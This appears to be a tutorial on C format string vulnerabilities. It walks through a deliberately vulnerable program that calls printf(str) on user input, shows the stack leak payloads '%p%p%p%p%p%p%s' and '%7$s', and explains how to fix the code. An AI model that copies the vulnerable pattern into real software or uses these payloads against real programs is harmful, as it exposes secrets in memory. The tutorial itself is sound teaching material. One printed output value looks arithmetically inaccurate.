
Getting to the vulnerability:

Let us consider a case where we forget to pass printf() the argument that its format specifier expects.

#include<stdio.h>

 int main()
 {
   int a=80;
   puts("Hello World");
   printf("The decimal is %d\n");
   return 0;
 }
Dump of assembler code for function main:
   0x0804843b <+0>:     lea    ecx,[esp+0x4]
   0x0804843f <+4>:     and    esp,0xfffffff0
   0x08048442 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048445 <+10>:    push   ebp
   0x08048446 <+11>:    mov    ebp,esp
   0x08048448 <+13>:    push   ecx
   0x08048449 <+14>:    sub    esp,0x14
   0x0804844c <+17>:    mov    DWORD PTR [ebp-0xc],0x50
   0x08048453 <+24>:    sub    esp,0xc
   0x08048456 <+27>:    push   0x8048500
   0x0804845b <+32>:    call   0x8048310 <puts@plt>
   0x08048460 <+37>:    add    esp,0x10
   0x08048463 <+40>:    sub    esp,0xc
   0x08048466 <+43>:    push   0x804850c
   0x0804846b <+48>:    call   0x8048300 <printf@plt>
   0x08048470 <+53>:    add    esp,0x10
   0x08048473 <+56>:    mov    eax,0x0
   0x08048478 <+61>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x0804847b <+64>:    leave
   0x0804847c <+65>:    lea    esp,[ecx-0x4]
   0x0804847f <+68>:    ret
End of assembler dump.

Notice that there is only one push instruction (push 0x804850c, the address of the format string) before the call to printf(). No value for ‘%d’ is pushed onto the stack.

The output will be:
Hello World
The decimal is 7
  1. Q. How does ‘7’ get there even though we never gave printf() a variable or value to print?

    To answer this question, we shall look at a snapshot of the stack just before the printf() function is called.

    [Figure fmt1: the stack just before the call to printf()]

    Have a look at the stack: at the top is the pointer to the format string. When printf() is called, ‘%d’ is replaced with whatever value sits on the stack right next to that pointer, because printf() assumes that the value to be printed has already been pushed onto the stack.

    How can this error become a vulnerability? Suppose the programmer decides to display a user-controlled string using printf(), with C code like this:

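    #include <stdio.h>

    int main()
    {
        char str[32];         /* buffer for the user's input (size chosen for illustration) */
        char *secret = "You don't get to see this";
        puts("I will repeat whatever you say");
        scanf("%31s", str);   /* bounded read into the buffer */
        printf(str);          /* vulnerable: user input is used as the format string */
        return 0;
    }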
    

    Here we have a printf() call whose only argument is the string ‘str’, which we control. If we apply the idea from the previous example, we can leak data that is on the stack at the moment printf() is called. Let us look at the stack right before printf() is called.

    [Figure fmt2: the stack just before the call to printf(), with input “Hello”]

    Here I gave “Hello” as the input, so the first argument is a pointer to “Hello” and the output is “Hello” itself. Have a look at the stack. The next value on the stack is the same pointer (this is because that pointer was itself pushed as an argument for the scanf() function). Let’s give ‘%d’ after “Hello” as the input and see what our output is.

    The input is "Hello%d"

    [Figure fmt3: the stack just before the call to printf(), with input “Hello%d”]

    Now there is a format specifier in our input. The next value on the stack is the pointer 0xffffd11c, so ‘%d’ prints that value as a signed decimal integer.

    The output we get is:
    Hello-12004
    

    -12004 is the value of 0xffffd11c when it is read as a signed 32-bit integer and printed in decimal.

    If we give more than one %d, we get correspondingly more values from the stack.

    When the input is “%p%p%p” (we want to print the values on the stack in hexadecimal):

    0xffffd11c0xf7e29a500x804853b
    
    Now let’s get to the fun part. The programmer clearly doesn’t want the user to know what the “secret” string is and no part of the code prints it out.

    The pointer to the “secret” string is stored on the stack, so we can print that pointer.

    input: %p%p%p%p%p%p%p
    
    Output:
    0xffffd11c0xf7e29a500x804853b0x10xffffd1140xffffd11c0x8048570
    
    As you can see, the last value, 0x8048570, is the pointer to “secret”. To view what the pointer holds, we need to dereference it and print the result. The ‘%s’ format specifier does exactly that. Could we simply replace all the %ps with %s?

    No, that would cause a segmentation fault. %s dereferences whatever value it finds on the stack, and printf() doesn’t check whether it is a valid address, so the program crashes as soon as %s hits a junk value such as 0x1. Instead, we replace only the last %p with %s:

    input : %p%p%p%p%p%p%s
    
    Output :
    0xffffd11c0xf7e29a500x804853b0x10xffffd1140xffffd11cYou don't get to see this
    
    We have successfully leaked information that the user should not be able to see.

    Hacking is not all about doing something we aren’t supposed to. It is equally important to analyse the vulnerability or the mistake the programmer made that led to the compromise of data security.

In the previous example we gave %p%p%p%p%p%p%s as the input to get the leak. The same input can be written more compactly as %7$s, which tells printf() to treat its 7th argument (the 7th value on the stack after the format string pointer) as a string pointer and print the string it points to. This will come in handy in the next section.

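If you are using a 64-bit binary, the offset changes: under the x86-64 System V calling convention, the first six integer or pointer arguments are passed in registers (rdi, rsi, rdx, rcx, r8, r9), so the first five arguments after the format string come from registers rather than from the stack.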

How could the programmer fix this issue?

  • printf() should always be given an explicit format string. A %s as the first argument and then the user-controlled string as the second will do no harm.
  • Alternatively, the puts() function can be used to display the string on the screen.
  • Avoid leaving sensitive data where it is not needed. Data abstraction is important.
Practice Challenges